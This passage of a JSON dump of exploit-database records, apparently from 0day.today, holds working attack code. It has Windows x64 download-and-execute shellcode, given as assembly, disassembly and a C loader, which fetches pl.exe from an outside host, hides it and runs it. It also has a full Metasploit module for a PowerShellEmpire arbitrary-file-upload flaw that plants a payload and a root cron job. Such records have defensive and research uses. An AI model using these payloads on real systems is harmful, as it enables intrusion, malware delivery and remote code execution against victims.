[r14+24],byte dl\r\n \r\n \r\n;----------------------------------------\r\n \r\n \r\nlea rcx,[r14+25]\r\n \r\n \r\n;url \"http://192.168.10.129/pl.exe\" length: 28+1\r\n \r\nmov rax,'http://1'\r\nmov [rcx],rax\r\nmov rax,'92.168.1'\r\nmov [rcx+8],rax\r\nmov rax,'0.129/pl'\r\nmov [rcx+16],rax\r\nmov [rcx+24],dword '.exe'\r\nmov [rcx+28],byte dl\r\n \r\n \r\n;---------------------------------------------------\r\n \r\nsub rsp,88\r\n \r\n \r\ndownload:\r\nxor rcx,rcx\r\nlea rdx,[r14+25]\r\nlea r8,[r14]\r\nxor r9,r9\r\nmov [rsp+32],r9\r\n \r\ncall r15\r\n \r\nxor rdx,rdx\r\ncmp rax,rdx\r\njnz download\r\n \r\n \r\n \r\n;------------------------------------------------\r\nsub rsp,88\r\n;-----------------------------------------------\r\n;hiding file\r\n \r\n \r\n \r\n \r\nmov dx,1131\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;SetFileAttributesA()\r\n \r\n \r\nlea rcx,[r14]\r\nxor rdx,rdx\r\nmov dl,2\r\n \r\ncall rbx\r\n \r\n;------------------------------------\r\n;executing file\r\nxor rdx,rdx\r\nmov dx,1314\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;WinExec()\r\n \r\n \r\nlea rcx,[r14]\r\n \r\nxor rdx,rdx\r\n \r\n \r\n \r\ncall rbx\r\n \r\n 
\r\n;------------------------------\r\nxor rdx,rdx\r\nmov dx,296\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\n;---------------------------------------\r\n \r\n;if U use this shellcode for pe injection, then don't forget to free allocated space\r\n \r\nadd rsp,88\r\nxor rcx,rcx\r\ncall rbx\r\n \r\n \r\n*/\r\n \r\n/*\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: 48 83 ec 58 sub $0x58,%rsp\r\n 4: 4c 8d 34 24 lea (%rsp),%r14\r\n 8: 48 83 ec 58 sub $0x58,%rsp\r\n c: 48 31 d2 xor %rdx,%rdx\r\n f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax\r\n 14: 48 8b 70 18 mov 0x18(%rax),%rsi\r\n 18: 48 8b 76 10 mov 0x10(%rsi),%rsi\r\n 1c: 48 ad lods %ds:(%rsi),%rax\r\n 1e: 48 8b 30 mov (%rax),%rsi\r\n 21: 48 8b 7e 30 mov 0x30(%rsi),%rdi\r\n 25: 8b 5f 3c mov 0x3c(%rdi),%ebx\r\n 28: 48 01 fb add %rdi,%rbx\r\n 2b: b2 88 mov $0x88,%dl\r\n 2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 30: 48 01 fb add %rdi,%rbx\r\n 33: 8b 73 1c mov 0x1c(%rbx),%esi\r\n 36: 48 01 fe add %rdi,%rsi\r\n 39: 66 ba 3f 03 mov $0x33f,%dx\r\n 3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 40: 48 01 fb add %rdi,%rbx\r\n 43: 48 31 d2 xor %rdx,%rdx\r\n 46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14)\r\n 4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14)\r\n 54: 41 88 56 06 mov %dl,0x6(%r14)\r\n 58: 49 8d 0e lea (%r14),%rcx\r\n 5b: ff d3 callq *%rbx\r\n 5d: 66 ba 4a 02 mov $0x24a,%dx\r\n 61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 64: 48 01 fb add %rdi,%rbx\r\n 67: 48 31 d2 xor %rdx,%rdx\r\n 6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx\r\n 71: 77 6e 6c \r\n 74: 49 89 0e mov %rcx,(%r14)\r\n 77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx\r\n 7e: 46 69 6c \r\n 81: 49 89 4e 08 mov %rcx,0x8(%r14)\r\n 85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)\r\n 8c: 41 88 56 12 mov %dl,0x12(%r14)\r\n 90: 49 8d 16 lea (%r14),%rdx\r\n 93: 48 89 c1 mov %rax,%rcx\r\n 96: ff d3 callq *%rbx\r\n 98: 49 89 c7 mov %rax,%r15\r\n 9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax\r\n a2: 73 65 72 \r\n 
a5: 49 89 06 mov %rax,(%r14)\r\n a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax\r\n af: 62 6c 69 \r\n b2: 49 89 46 08 mov %rax,0x8(%r14)\r\n b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax\r\n bd: 65 78 65 \r\n c0: 49 89 46 10 mov %rax,0x10(%r14)\r\n c4: 48 31 d2 xor %rdx,%rdx\r\n c7: 41 88 56 18 mov %dl,0x18(%r14)\r\n cb: 49 8d 4e 19 lea 0x19(%r14),%rcx\r\n cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax\r\n d6: 2f 2f 31 \r\n d9: 48 89 01 mov %rax,(%rcx)\r\n dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax\r\n e3: 38 2e 31 \r\n e6: 48 89 41 08 mov %rax,0x8(%rcx)\r\n ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax\r\n f1: 2f 70 6c \r\n f4: 48 89 41 10 mov %rax,0x10(%rcx)\r\n f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)\r\n ff: 88 51 1c mov %dl,0x1c(%rcx)\r\n 102: 48 83 ec 58 sub $0x58,%rsp\r\n \r\n0000000000000106 <download>:\r\n 106: 48 31 c9 xor %rcx,%rcx\r\n 109: 49 8d 56 19 lea 0x19(%r14),%rdx\r\n 10d: 4d 8d 06 lea (%r14),%r8\r\n 110: 4d 31 c9 xor %r9,%r9\r\n 113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)\r\n 118: 41 ff d7 callq *%r15\r\n 11b: 48 31 d2 xor %rdx,%rdx\r\n 11e: 48 39 d0 cmp %rdx,%rax\r\n 121: 75 e3 jne 106 <download>\r\n 123: 48 83 ec 58 sub $0x58,%rsp\r\n 127: 66 ba 6b 04 mov $0x46b,%dx\r\n 12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 12e: 48 01 fb add %rdi,%rbx\r\n 131: 49 8d 0e lea (%r14),%rcx\r\n 134: 48 31 d2 xor %rdx,%rdx\r\n 137: b2 02 mov $0x2,%dl\r\n 139: ff d3 callq *%rbx\r\n 13b: 48 31 d2 xor %rdx,%rdx\r\n 13e: 66 ba 22 05 mov $0x522,%dx\r\n 142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 145: 48 01 fb add %rdi,%rbx\r\n 148: 49 8d 0e lea (%r14),%rcx\r\n 14b: 48 31 d2 xor %rdx,%rdx\r\n 14e: ff d3 callq *%rbx\r\n 150: 48 31 d2 xor %rdx,%rdx\r\n 153: 66 ba 28 01 mov $0x128,%dx\r\n 157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 15a: 48 01 fb add %rdi,%rbx\r\n 15d: 48 83 c4 58 add $0x58,%rsp\r\n 161: 48 31 c9 xor %rcx,%rcx\r\n 164: ff d3 callq *%rbx\r\n \r\n*/\r\n 
\r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n \r\nchar shellcode[]=\\\r\n \r\n\"\\x48\\x83\\xec\\x58\\x4c\\x8d\\x34\\x24\\x48\\x83\\xec\\x58\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x70\\x18\\x48\\x8b\\x76\\x10\\x48\\xad\\x48\\x8b\\x30\\x48\\x8b\\x7e\\x30\\x8b\\x5f\\x3c\\x48\\x01\\xfb\\xb2\\x88\\x8b\\x1c\\x13\\x48\\x01\\xfb\\x8b\\x73\\x1c\\x48\\x01\\xfe\\x66\\xba\\x3f\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x31\\xd2\\x41\\xc7\\x06\\x75\\x72\\x6c\\x6d\\x66\\x41\\xc7\\x46\\x04\\x6f\\x6e\\x41\\x88\\x56\\x06\\x49\\x8d\\x0e\\xff\\xd3\\x66\\xba\\x4a\\x02\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x31\\xd2\\x48\\xb9\\x55\\x52\\x4c\\x44\\x6f\\x77\\x6e\\x6c\\x49\\x89\\x0e\\x48\\xb9\\x6f\\x61\\x64\\x54\\x6f\\x46\\x69\\x6c\\x49\\x89\\x4e\\x08\\x66\\x41\\xc7\\x46\\x10\\x65\\x41\\x41\\x88\\x56\\x12\\x49\\x8d\\x16\\x48\\x89\\xc1\\xff\\xd3\\x49\\x89\\xc7\\x48\\xb8\\x43\\x3a\\x5c\\x5c\\x55\\x73\\x65\\x72\\x49\\x89\\x06\\x48\\xb8\\x73\\x5c\\x5c\\x50\\x75\\x62\\x6c\\x69\\x49\\x89\\x46\\x08\\x48\\xb8\\x63\\x5c\\x5c\\x70\\x2e\\x65\\x78\\x65\\x49\\x89\\x46\\x10\\x48\\x31\\xd2\\x41\\x88\\x56\\x18\\x49\\x8d\\x4e\\x19\\x48\\xb8\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x48\\x89\\x01\\x48\\xb8\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x48\\x89\\x41\\x08\\x48\\xb8\\x30\\x2e\\x31\\x32\\x39\\x2f\\x70\\x6c\\x48\\x89\\x41\\x10\\xc7\\x41\\x18\\x2e\\x65\\x78\\x65\\x88\\x51\\x1c\\x48\\x83\\xec\\x58\\x48\\x31\\xc9\\x49\\x8d\\x56\\x19\\x4d\\x8d\\x06\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x41\\xff\\xd7\\x48\\x31\\xd2\\x48\\x39\\xd0\\x75\\xe3\\x48\\x83\\xec\\x58\\x66\\xba\\x6b\\x04\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0e\\x48\\x31\\xd2\\xb2\\x02\\xff\\xd3\\x48\\x31\\xd2\\x66\\xba\\x22\\x05\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0e\\x48\\x31\\xd2\\xff\\xd3\\x48\\x31\\xd2\\x66\\xba\\x28\\x01\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x83\\xc4\\x58\\x48\\x31\\xc9\\xff\\xd3\";\r\n \r\nint main()\r\n{\r\nint len=strlen(shellcode);\r\nDWORD l=0;\r\nprintf(\"shellcode 
length : %d\\n\",len);\r\nVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);\r\n(* (int(*)()) shellcode)();\r\n \r\nreturn 0;\r\n \r\n}\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26407"}, {"lastseen": "2018-02-16T09:13:17", "references": [], "description": "A vulnerability existed in the PowerShellEmpire server prior to commit f030cf62 which would allow an arbitrary file to be written to an attacker controlled location with the permissions of the Empire server. This exploit will write the payload to /tmp/ directory followed by a cron.d file to execute the payload.", "edition": 1, "reporter": "metasploit", "published": "2016-11-18T00:00:00", "title": "PowerShellEmpire Arbitrary File Upload (Skywalker) Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-16T09:13:17", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-11-18T00:00:00", "id": "1337DAY-ID-26353", "href": "https://0day.today/exploit/description/26353", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n TASK_DOWNLOAD = 41\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',\r\n 'Description' => %q{\r\n A vulnerability existed in the PowerShellEmpire server prior to commit\r\n f030cf62 which would allow an arbitrary file to be written to an\r\n attacker controlled location with the permissions of the Empire server.\r\n\r\n This exploit will write the payload to /tmp/ directory followed by a\r\n cron.d file to execute the payload.\r\n },\r\n 'Author' =>\r\n 
[\r\n 'Spencer McIntyre', # Vulnerability discovery & Metasploit module\r\n 'Erik Daguerre' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['URL', 'http://www.harmj0y.net/blog/empire/empire-fails/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Platform' => %w{ linux python },\r\n 'Targets' =>\r\n [\r\n [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],\r\n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],\r\n [ 'Linux x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ]\r\n ],\r\n 'DefaultOptions' => { 'WfsDelay' => 75 },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 15 2016'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]),\r\n OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]),\r\n OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]),\r\n OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n return Exploit::CheckCode::Safe if get_staging_key.nil?\r\n\r\n Exploit::CheckCode::Appears\r\n end\r\n\r\n def aes_encrypt(key, data, include_mac=false)\r\n cipher = OpenSSL::Cipher::AES256.new(:CBC)\r\n cipher.encrypt\r\n iv = cipher.random_iv\r\n cipher.key = key\r\n cipher.iv = iv\r\n data = iv + cipher.update(data) + cipher.final\r\n\r\n digest = OpenSSL::Digest.new('sha1')\r\n data << OpenSSL::HMAC.digest(digest, key, data) if include_mac\r\n\r\n data\r\n end\r\n\r\n def create_packet(res_id, data, counter=nil)\r\n data = Rex::Text::encode_base64(data)\r\n counter = Time.new.to_i if counter.nil?\r\n\r\n [ res_id, counter, data.length ].pack('VVV') + data\r\n end\r\n\r\n def reversal_key\r\n # reversal key for commit da52a626 (March 3rd, 2016) - present (September 21st, 2016)\r\n [\r\n [ 160, 0x3d], [ 
33, 0x2c], [ 34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [ 37, 0x2c], [ 38, 0x24], [ 199, 0x2d],\r\n [ 8, 0x20], [ 41, 0x3d], [ 42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [ 14, 0x2d], [ 47, 0x29],\r\n [ 272, 0x5d], [ 113, 0x3b], [ 82, 0x3b], [ 51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [ 86, 0x2d], [ 183, 0x3a],\r\n [ 24, 0x7b], [ 57, 0x2d], [ 282, 0x20], [ 91, 0x20], [ 92, 0x2d], [ 157, 0x3b], [ 30, 0x28], [ 31, 0x24]\r\n ]\r\n end\r\n\r\n def rsa_encode_int(value)\r\n encoded = []\r\n while value > 0 do\r\n encoded << (value & 0xff)\r\n value >>= 8\r\n end\r\n\r\n Rex::Text::encode_base64(encoded.reverse.pack('C*'))\r\n end\r\n\r\n def rsa_key_to_xml(rsa_key)\r\n rsa_key_xml = \"<RSAKeyValue>\\n\"\r\n rsa_key_xml << \" <Exponent>#{ rsa_encode_int(rsa_key.e.to_i) }</Exponent>\\n\"\r\n rsa_key_xml << \" <Modulus>#{ rsa_encode_int(rsa_key.n.to_i) }</Modulus>\\n\"\r\n rsa_key_xml << \"</RSAKeyValue>\"\r\n\r\n rsa_key_xml\r\n end\r\n\r\n def get_staging_key\r\n # STAGE0_URI resource requested by the initial launcher\r\n # The default STAGE0_URI resource is index.asp\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])\r\n })\r\n return unless res and res.code == 200\r\n\r\n staging_key = Array.new(32, nil)\r\n staging_data = res.body.bytes\r\n\r\n reversal_key.each_with_index do |(pos, char_code), key_pos|\r\n staging_key[key_pos] = staging_data[pos] ^ char_code\r\n end\r\n\r\n return if staging_key.include? 
nil\r\n\r\n # at this point the staging key should have been fully recovered but\r\n # we'll verify it by attempting to decrypt the header of the stage\r\n decrypted = []\r\n staging_data[0..23].each_with_index do |byte, pos|\r\n decrypted << (byte ^ staging_key[pos])\r\n end\r\n return unless decrypted.pack('C*').downcase == 'function start-negotiate'\r\n\r\n staging_key\r\n end\r\n\r\n def write_file(path, data, session_id, session_key, server_epoch)\r\n # target_url.path default traffic profile for empire agent communication\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50\r\n data = create_packet(\r\n TASK_DOWNLOAD,\r\n [\r\n '0',\r\n session_id + path,\r\n Rex::Text::encode_base64(data)\r\n ].join('|'),\r\n server_epoch\r\n )\r\n\r\n if datastore['PROFILE'].blank?\r\n profile_uri = normalize_uri(target_uri.path, %w{ admin/get.php news.asp login/process.jsp }.sample)\r\n else\r\n profile_uri = normalize_uri(target_uri.path, datastore['PROFILE'])\r\n end\r\n\r\n res = send_request_cgi({\r\n 'cookie' => \"SESSIONID=#{session_id}\",\r\n 'data' => aes_encrypt(session_key, data, include_mac=true),\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(profile_uri)\r\n })\r\n fail_with(Failure::Unknown, \"Failed to write file\") unless res and res.code == 200\r\n\r\n res\r\n end\r\n\r\n def cron_file(command)\r\n cron_file = 'SHELL=/bin/sh'\r\n cron_file << \"\\n\"\r\n cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin'\r\n cron_file << \"\\n\"\r\n cron_file << \"* * * * * root #{command}\"\r\n cron_file << \"\\n\"\r\n\r\n cron_file\r\n end\r\n\r\n def exploit\r\n vprint_status('Recovering the staging key...')\r\n staging_key = get_staging_key\r\n if staging_key.nil?\r\n fail_with(Failure::Unknown, 'Failed to recover the staging key')\r\n end\r\n vprint_status(\"Successfully recovered the staging key: #{staging_key.map { |b| b.to_s(16) }.join(':')}\")\r\n staging_key = 
staging_key.pack('C*')\r\n\r\n rsa_key = OpenSSL::PKey::RSA.new(2048)\r\n session_id = Array.new(50, '..').join('/')\r\n # STAGE1_URI, The resource used by the RSA key post\r\n # The default STAGE1_URI resource is index.jsp\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37\r\n res = send_request_cgi({\r\n 'cookie' => \"SESSIONID=#{session_id}\",\r\n 'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])\r\n })\r\n fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200\r\n vprint_status(\"Successfully sent the RSA key\")\r\n\r\n # decrypt the response and pull out the epoch and session_key\r\n body = rsa_key.private_decrypt(res.body)\r\n server_epoch = body[0..9].to_i\r\n session_key = body[10..-1]\r\n print_status('Successfully negotiated an artificial Empire agent')\r\n\r\n payload_data = nil\r\n payload_path = '/tmp/' + rand_text_alpha(8)\r\n\r\n case target['Arch']\r\n when ARCH_PYTHON\r\n cron_command = \"python #{payload_path}\"\r\n payload_data = payload.raw\r\n\r\n when ARCH_X86, ARCH_X86_64\r\n cron_command = \"chmod +x #{payload_path} && #{payload_path}\"\r\n payload_data = payload.encoded_exe\r\n\r\n end\r\n\r\n print_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, payload_data, session_id, session_key, server_epoch)\r\n\r\n cron_path = '/etc/cron.d/' + rand_text_alpha(8)\r\n print_status(\"Writing cron job to #{cron_path}\")\r\n\r\n write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)\r\n print_status(\"Waiting for cron job to run, can take up to 60 seconds\")\r\n\r\n register_files_for_cleanup(cron_path)\r\n register_files_for_cleanup(payload_path)\r\n # Empire writes to a log file location based on the Session ID, so when\r\n # exploiting this vulnerability that file ends up in the root 
directory.\r\n register_files_for_cleanup('/agent.log')\r\n end\r\nend\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26353"}]}}